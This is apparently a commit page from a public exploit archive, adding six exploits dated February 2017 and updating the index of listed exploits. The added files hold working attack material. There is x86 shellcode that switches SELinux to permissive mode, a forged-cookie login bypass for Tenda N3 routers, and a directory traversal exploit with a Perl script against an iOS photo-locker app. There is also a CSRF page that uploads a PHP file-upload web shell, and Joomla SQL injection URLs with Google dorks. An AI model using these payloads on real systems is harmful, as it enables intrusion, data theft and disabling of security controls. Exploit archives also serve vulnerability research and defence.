DB: 2017-02-21
6 new exploits EFS Easy Chat Server - Authentication Request Buffer Overflow (SEH) EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (SEH) EFS Easy Chat Server - Cross-Site Request Forgery (Change Admin Password) EFS Easy Chat Server 2.2 - Cross-Site Request Forgery (Change Admin Password) EFS Easy Chat Server - Authentication Request Buffer Overflow (Perl) EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl) yaws 1.89 - Directory Traversal Yaws 1.89 - Directory Traversal Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes) Jogjacamp JProfile Gold - (id_news) SQL Injection Jogjacamp JProfile Gold - 'id_news' Parameter SQL Injection RSS News AutoPilot Script 1.0.1 / 3.0.3 - Cross-Site Request Forgery Joomla! Component MaQma Helpdesk 4.2.7 - 'id' Parameter SQL Injection Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection Album Lock 4.0 iOS - Directory Traversal Tenda N3 Wireless N150 Home Router - Authentication Bypass
This commit is contained in:
parent
ae0dd9fa7c
commit
4195f70ade
7 changed files with 462 additions and 5 deletions
16
files.csv
16
files.csv
|
@ -9946,12 +9946,12 @@ id,file,description,date,author,platform,type,port
|
|||
8097,platforms/multiple/remote/8097.txt,"MLdonkey 2.9.7 - Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",multiple,remote,0
|
||||
8117,platforms/windows/remote/8117.pl,"POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)",2009-02-27,"Jeremy Brown",windows,remote,0
|
||||
8118,platforms/windows/remote/8118.html,"Orbit Downloader 2.8.4 - Long Hostname Remote Buffer Overflow",2009-02-27,JavaGuru,windows,remote,0
|
||||
8142,platforms/windows/remote/8142.py,"EFS Easy Chat Server - Authentication Request Buffer Overflow (SEH)",2009-03-03,His0k4,windows,remote,80
|
||||
8142,platforms/windows/remote/8142.py,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (SEH)",2009-03-03,His0k4,windows,remote,80
|
||||
8143,platforms/windows/remote/8143.html,"Sopcast SopCore Control - 'sopocx.ocx' Command Execution",2009-03-03,Nine:Situations:Group,windows,remote,0
|
||||
8144,platforms/windows/remote/8144.txt,"Imera ImeraIEPlugin - ActiveX Control Remote Code Execution",2009-03-03,Elazar,windows,remote,0
|
||||
8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - Cross-Site Request Forgery (Change Admin Password)",2009-03-03,Stack,windows,remote,0
|
||||
8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server 2.2 - Cross-Site Request Forgery (Change Admin Password)",2009-03-03,Stack,windows,remote,0
|
||||
8152,platforms/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)",2009-03-04,"Ahmed Obied",windows,remote,0
|
||||
8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server - Authentication Request Buffer Overflow (Perl)",2009-03-04,Dr4sH,windows,remote,80
|
||||
8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl)",2009-03-04,Dr4sH,windows,remote,80
|
||||
8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 - File Disclosure",2009-03-04,Stack,windows,remote,0
|
||||
8160,platforms/windows/remote/8160.html,"SupportSoft DNA Editor Module - 'dnaedit.dll' Code Execution",2009-03-05,Nine:Situations:Group,windows,remote,0
|
||||
8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus - UPS-Service Buffer Overflow",2009-03-09,Elazar,windows,remote,0
|
||||
|
@ -10443,7 +10443,7 @@ id,file,description,date,author,platform,type,port
|
|||
15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0
|
||||
15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
|
||||
15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
|
||||
15371,platforms/windows/remote/15371.txt,"yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0
|
||||
15371,platforms/windows/remote/15371.txt,"Yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0
|
||||
15373,platforms/windows/remote/15373.txt,"mongoose Web server 2.11 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0
|
||||
15421,platforms/windows/remote/15421.html,"Microsoft Internet Explorer 6/7/8 - Memory Corruption",2010-11-04,ryujin,windows,remote,0
|
||||
15423,platforms/android/remote/15423.html,"Google Android 2.0 < 2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0
|
||||
|
@ -15899,6 +15899,7 @@ id,file,description,date,author,platform,type,port
|
|||
41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
|
||||
41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
|
||||
41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
|
||||
41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
@ -20815,7 +20816,7 @@ id,file,description,date,author,platform,type,port
|
|||
8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 - SQL Injection / Authentication Bypass / Local File Inclusion",2009-03-03,"Salvatore Fresta",php,webapps,0
|
||||
8145,platforms/php/webapps/8145.txt,"tghostscripter Amazon Shop - Cross-Site Scripting / Directory Traversal / Remote File Inclusion",2009-03-03,d3b4g,php,webapps,0
|
||||
8150,platforms/php/webapps/8150.txt,"Novaboard 1.0.1 - Cross-Site Scripting",2009-03-03,Pepelux,php,webapps,0
|
||||
8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - (id_news) SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0
|
||||
8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - 'id_news' Parameter SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0
|
||||
8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0
|
||||
8164,platforms/php/webapps/8164.php,"Joomla! Component com_iJoomla_archive - Blind SQL Injection",2009-03-05,Stack,php,webapps,0
|
||||
8165,platforms/php/webapps/8165.txt,"Blue Eye CMS 1.0.0 - Remote Cookie SQL Injection",2009-03-06,ka0x,php,webapps,0
|
||||
|
@ -37310,7 +37311,12 @@ id,file,description,date,author,platform,type,port
|
|||
41389,platforms/php/webapps/41389.txt,"Joomla! Component Room Management 1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41390,platforms/php/webapps/41390.txt,"Joomla! Component Bazaar Platform 3.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41391,platforms/php/webapps/41391.txt,"Joomla! Component Google Map Store Locator 4.4 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41392,platforms/php/webapps/41392.html,"RSS News AutoPilot Script 1.0.1 / 3.0.3 - Cross-Site Request Forgery",2016-08-30,"Arbin Godar",php,webapps,0
|
||||
41393,platforms/php/webapps/41393.txt,"Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41394,platforms/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,hardware,webapps,0
|
||||
41395,platforms/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,windows,webapps,0
|
||||
41396,platforms/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,php,webapps,0
|
||||
41399,platforms/php/webapps/41399.txt,"Joomla! Component MaQma Helpdesk 4.2.7 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0
|
||||
41400,platforms/php/webapps/41400.txt,"Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0
|
||||
41401,platforms/ios/webapps/41401.txt,"Album Lock 4.0 iOS - Directory Traversal",2017-02-20,Vulnerability-Lab,ios,webapps,0
|
||||
41402,platforms/hardware/webapps/41402.txt,"Tenda N3 Wireless N150 Home Router - Authentication Bypass",2015-09-03,"Mandeep Jadon",hardware,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
38
platforms/hardware/webapps/41402.txt
Executable file
38
platforms/hardware/webapps/41402.txt
Executable file
|
@ -0,0 +1,38 @@
|
|||
# Exploit Title: Complete Authentication Bypass In Tenda N3 Wireless N150 Routers
|
||||
# Date: 03-09-2015
|
||||
# Software Link: http://tendacn.com/en/product/N150.html
|
||||
# Exploit Author: Mandeep Jadon
|
||||
# Contact: http://twitter.com/1337tr0lls
|
||||
# Website: http://twitter.com/1337tr0lls
|
||||
# CVE: CVE-2015-5995
|
||||
# Category: Device
|
||||
|
||||
|
||||
Description:
|
||||
|
||||
The router (AP) is using very poor authentication mechanism . It uses a
|
||||
static cookie to verify the incoming authentication. After careful
|
||||
inspection it was found that the cookie used were same for any number of
|
||||
authentication by the Admin .
|
||||
|
||||
Thus the cookie can be easily forged and the admin account could be
|
||||
compromised without supplying the credentials .
|
||||
|
||||
Proof Of Concept:
|
||||
|
||||
Inject the following cookie in the browser with the given values :
|
||||
|
||||
admin:language : en
|
||||
|
||||
Reload the page . You are logged into the admin account .
|
||||
|
||||
Video POC : https://www.youtube.com/watch?v=dvF-7KK0g6E
|
||||
|
||||
Mitigation :
|
||||
|
||||
Use: a secure authentication mechanism consisting of random , complex
|
||||
cookies .
|
||||
|
||||
References :
|
||||
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5995
|
||||
https://www.kb.cert.org/vuls/id/630872
|
186
platforms/ios/webapps/41401.txt
Executable file
186
platforms/ios/webapps/41401.txt
Executable file
|
@ -0,0 +1,186 @@
|
|||
Document Title:
|
||||
===============
|
||||
Album Lock v4.0 iOS - Directory Traversal Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2033
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-02-20
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2033
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
7.2
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Do you have any secret photo and videos in your iPhone? Album Lock can protect your privacy perfectly. Album is the most
|
||||
convenient private Photo&Video App! You can add your SPECIAL photos&videos into AlbumLock, we provides many convenient ways.
|
||||
From Photo App(Camera Roll), iTunes File Sharing Sync, WiFi Transfer and in App Camera.
|
||||
|
||||
(Copy of the Homepage: https://itunes.apple.com/us/app/album-lock-lock-secret-photo/id851608952 )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the official Album Lock v4.0 ios mobile application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2017-02-20: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A directory traversal web vulnerability has been dsicovered in the official Album Lock v4.0 iOS mobile web-application.
|
||||
The issue allows an attackers to unauthorized request and download local application files by manipulation of path parameters.
|
||||
|
||||
The directory traversal web vulnerability is located in the `filePaht` parameter of the wifi web-server interface. Remote attackers
|
||||
are able to request the local web-server during the sharing process to access unauthenticated application files. Attackers are able
|
||||
to request via `getObject` image path variables to access or download files. Remote attackers are able to access the root `document`
|
||||
path of the application. The request method to execute is GET and the attack vector is located on the client-side of the web-server
|
||||
web-application. Finally an attacker is able to access with the credentials the service by using a client via http protocol.
|
||||
|
||||
The security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.2.
|
||||
Exploitation of the web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the
|
||||
vulnerability results in information leaking, mobile application compromise by unauthorized and unauthenticated access.
|
||||
|
||||
Request Method(s):
|
||||
[+] GET
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] getObject
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] filePaht
|
||||
|
||||
Affected Module(s):
|
||||
[+] Web-Server File System
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The security vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
Standard Request:
|
||||
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/._alias_images/fhhjjj/picture-00001.png
|
||||
|
||||
|
||||
PoC: Payload
|
||||
/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application
|
||||
|
||||
|
||||
Malicious Request: Exploitation
|
||||
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/
|
||||
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/
|
||||
http://localhost:8880/getImage?filePaht=/var/mobile/
|
||||
|
||||
|
||||
PoC: Exploit
|
||||
use strict;
|
||||
use LWP::UserAgent;
|
||||
my $b = LWP::UserAgent->new();
|
||||
my $host = "1.1.1.1:5555";
|
||||
print $b->get("http://".$host."/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/config.dat")->content;
|
||||
|
||||
|
||||
--- PoC Session Logs [GET] ---
|
||||
Status: 200[OK]
|
||||
GET http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application
|
||||
Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8880]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
|
||||
Accept[*/*]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Referer[http://localhost:8880/list_gif.html?folder=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/]
|
||||
Connection[keep-alive]
|
||||
Response Header:
|
||||
Accept-Ranges[bytes]
|
||||
|
||||
|
||||
Reference(s):
|
||||
http://localhost:8880/
|
||||
http://localhost:8880/getImage
|
||||
http://localhost:8880/getImage?filePaht=
|
||||
http://localhost:8880/list_gif.html
|
||||
http://localhost:8880/list_gif.html?folder=
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patch by disallowing the filepaht parameter to request upper local paths outside the document folder.
|
||||
Include a whitelist of allowed requested path and setup a secure exception to prevent on exploitation.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the directory traversal web vulnerability in the mobile application is estimated as high. (CVSS 7.2)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
|
||||
deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
|
||||
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
|
||||
|
||||
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
|
||||
|
80
platforms/lin_x86/shellcode/41403.c
Executable file
80
platforms/lin_x86/shellcode/41403.c
Executable file
|
@ -0,0 +1,80 @@
|
|||
# Title: x86 SELinux change between permissive and enforcing modes shellcode
|
||||
# Date: 20-02-2017
|
||||
# Author: Krzysztof Przybylski
|
||||
# Platform: Lin_x86
|
||||
# Tested on: CentOS 6.8 (i686)
|
||||
# Shellcode Size: 45 bytes
|
||||
# ID: SLAE - 871
|
||||
/*
|
||||
|
||||
1. Description:
|
||||
|
||||
SELinux mode switcher. Permissive = "\x30"; Enforcing = "\x31"
|
||||
gcc -fno-stack-protector -z execstack SELinux-mode.c -o SELinux-mode
|
||||
|
||||
2. Disassembly of section .text:
|
||||
|
||||
08048060 <_start>:
|
||||
8048060: 6a 0b push 0xb
|
||||
8048062: 58 pop eax
|
||||
8048063: 31 d2 xor edx,edx
|
||||
8048065: 52 push edx
|
||||
8048066: 6a 30 push 0x30
|
||||
8048068: 89 e1 mov ecx,esp
|
||||
804806a: 52 push edx
|
||||
804806b: 68 6f 72 63 65 push 0x6563726f
|
||||
8048070: 68 74 65 6e 66 push 0x666e6574
|
||||
8048075: 68 6e 2f 73 65 push 0x65732f6e
|
||||
804807a: 68 2f 73 62 69 push 0x6962732f
|
||||
804807f: 68 2f 75 73 72 push 0x7273752f
|
||||
8048084: 89 e3 mov ebx,esp
|
||||
8048086: 52 push edx
|
||||
8048087: 51 push ecx
|
||||
8048088: 53 push ebx
|
||||
8048089: 89 e1 mov ecx,esp
|
||||
804808b: cd 80 int 0x80
|
||||
|
||||
3. Code
|
||||
|
||||
global _start
|
||||
section .text
|
||||
_start:
|
||||
push 0xb
|
||||
pop eax
|
||||
xor edx, edx
|
||||
push edx
|
||||
push byte 0x30
|
||||
mov ecx, esp
|
||||
push edx
|
||||
push 0x6563726f
|
||||
push 0x666e6574
|
||||
push 0x65732f6e
|
||||
push 0x6962732f
|
||||
push 0x7273752f
|
||||
mov ebx, esp
|
||||
push edx
|
||||
push ecx
|
||||
push ebx
|
||||
mov ecx, esp
|
||||
int 0x80
|
||||
*/
|
||||
|
||||
#include<stdio.h>
|
||||
#include<string.h>
|
||||
|
||||
unsigned char code[] = \
|
||||
"\x6a\x0b\x58\x31\xd2\x52\x6a"
|
||||
"\x30"
|
||||
"\x89\xe1\x52\x68\x6f\x72\x63\x65"
|
||||
"\x68\x74\x65\x6e\x66\x68\x6e\x2f"
|
||||
"\x73\x65\x68\x2f\x73\x62\x69\x68"
|
||||
"\x2f\x75\x73\x72\x89\xe3\x52\x51"
|
||||
"\x53\x89\xe1\xcd\x80";
|
||||
|
||||
main()
|
||||
{
|
||||
printf("Shellcode Length: %d\n", strlen(code));
|
||||
int (*ret)() = (int(*)())code;
|
||||
ret();
|
||||
}
|
||||
|
112
platforms/php/webapps/41392.html
Executable file
112
platforms/php/webapps/41392.html
Executable file
|
@ -0,0 +1,112 @@
|
|||
# Exploit Title: RSS News AutoPilot Script 1.0.1 / 3.0.3 - CSRF to
|
||||
Persistent XSS and RCE Through Unrestricted File Upload
|
||||
# Date: 30 August 2016
|
||||
# Exploit Author: Arbin Godar
|
||||
# Website : ArbinGodar.com
|
||||
# Software Link: https://codecanyon.net/item/rss-news-autopilot-script/11812898
|
||||
# Version: 1.0.1 to 3.0.3
|
||||
|
||||
----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
RSS News AutoPilot Script File:
|
||||
http://www.mediafire.com/file/6dmegm8ak1jv2u1/rss.zip
|
||||
|
||||
Description:
|
||||
An Attackers are able to execute js and php code on web
|
||||
application using RSS News - AutoPilot Script which allow an attacker to
|
||||
create a post when an authenticated user/admin browses a special
|
||||
crafted web page. Also, all the process was possible without any
|
||||
authenticated user/admin for more info watch the below PoC Video.
|
||||
|
||||
The title parameter was not filtering special characters mean
|
||||
vulnerable to XSS and while uploading image they weren't filtering the file
|
||||
type mean vulnerable to unrestricted file upload. So, now by creating CSRF
|
||||
exploit code for posting
|
||||
an article with XSS alert JS payload as title of post and php file as a
|
||||
image. Now if the
|
||||
attacker is able to perform CSRF attack sucessfully then XSS will be
|
||||
triggered and we can execute php code too.
|
||||
|
||||
PoC Video: https://youtu.be/znDgv8K0yFk
|
||||
|
||||
CSRF Exploit Code:
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<title>[RSS News - AutoPilot Script] CSRF to Persistent XSS and
|
||||
RCE</title>
|
||||
<script>
|
||||
function submitRequest()
|
||||
{
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", "http://localhost/news.php?case=add", true);
|
||||
xhr.setRequestHeader("Accept",
|
||||
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
|
||||
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
|
||||
xhr.setRequestHeader("Content-Type", "multipart/form-data;
|
||||
boundary=---------------------------2331884730649");
|
||||
xhr.withCredentials = true;
|
||||
var body = "-----------------------------2331884730649\r\n" +
|
||||
"Content-Disposition: form-data; name=\"title\"\r\n" +
|
||||
"\r\n" +
|
||||
"Test\r\n" +
|
||||
"-----------------------------2331884730649\r\n" +
|
||||
"Content-Disposition: form-data; name=\"category_id\"\r\n" +
|
||||
"\r\n" +
|
||||
"1\r\n" +
|
||||
"-----------------------------2331884730649\r\n" +
|
||||
"Content-Disposition: form-data; name=\"thumbnail\";
|
||||
filename=\"lod.php\"\r\n" +
|
||||
"Content-Type: application/octet-stream\r\n" +
|
||||
"\r\n" +
|
||||
"\x3c?php echo \'\x3cform action=\"\" method=\"post\"
|
||||
enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\"\x3e\';
|
||||
echo \'\x3cinput type=\"file\" name=\"file\" size=\"50\"\x3e\x3cinput
|
||||
name=\"_upl\" type=\"submit\" id=\"_upl\"
|
||||
value=\"Upload\"\x3e\x3c/form\x3e\'; if( $_POST[\'_upl\'] == \"Upload\" ) {
|
||||
if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) {
|
||||
echo \'\x3cb\x3eUpload Sukses!!!\x3cb\x3e\x3cbr\x3e\x3cbr\x3e\'; } else {
|
||||
echo \'\x3cb\x3eGagal Upload!!!\x3c/b\x3e\x3cbr\x3e\x3cbr\x3e\'; } } ?\x3e
|
||||
\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------2331884730649\r\n" +
|
||||
"Content-Disposition: form-data; name=\"details\"\r\n" +
|
||||
"\r\n" +
|
||||
"\x3cp\x3etest\x3c/p\x3e\r\n" +
|
||||
"-----------------------------2331884730649\r\n" +
|
||||
"Content-Disposition: form-data; name=\"published\"\r\n" +
|
||||
"\r\n" +
|
||||
"1\r\n" +
|
||||
"-----------------------------2331884730649\r\n" +
|
||||
"Content-Disposition: form-data; name=\"submit\"\r\n" +
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------2331884730649--\r\n";
|
||||
var aBody = new Uint8Array(body.length);
|
||||
for (var i = 0; i < aBody.length; i++)
|
||||
aBody[i] = body.charCodeAt(i);
|
||||
xhr.send(new Blob([aBody]));
|
||||
}
|
||||
</script>
|
||||
<br><br><br>
|
||||
<center>
|
||||
<h2><font color="red">[RSS News - AutoPilot Script] CSRF to Persistent
|
||||
XSS and RCE</font></h2>
|
||||
<form action="#">
|
||||
<input type="button" value="Submit request"
|
||||
onclick="submitRequest();" />
|
||||
</form>
|
||||
</center>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Vendor Shouted Urgent Update:
|
||||
http://wpsup.com/products/rss-news-script/urgent-update-fix-security-bugs/
|
||||
|
||||
Fix/Patch: Update to latest version.
|
||||
|
||||
----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
Regards,
|
||||
Arbin Godar
|
||||
https://twitter.com/arbingodar
|
17
platforms/php/webapps/41399.txt
Executable file
17
platforms/php/webapps/41399.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component MaQma Helpdesk v4.2.7 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_maqmahelpdesk
|
||||
# Date: 20.02.2017
|
||||
# Vendor Homepage: http://componentslab.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/maqma-helpdesk/
|
||||
# Demo: http://demo.componentslab.com/index.php/department/software-support
|
||||
# Version: 4.2.7
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_maqmahelpdesk&task=pdf_kb&id=[SQL]
|
||||
# # # # #
|
18
platforms/php/webapps/41400.txt
Executable file
18
platforms/php/webapps/41400.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component PayPal IPN for DOCman v3.1 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_docmanpaypal
|
||||
# Date: 20.02.2017
|
||||
# Vendor Homepage: http://shopfiles.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/docman-extensions/paypal-ipn-for-docman/
|
||||
# Demo: http://demo.shopfiles.com/index.php/paypal-ipn-for-docman
|
||||
# Version: 3.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_docmanpaypal&task=addToCart&id=[SQL]
|
||||
# # # # #
|
||||
|
Loading…
Add table
Reference in a new issue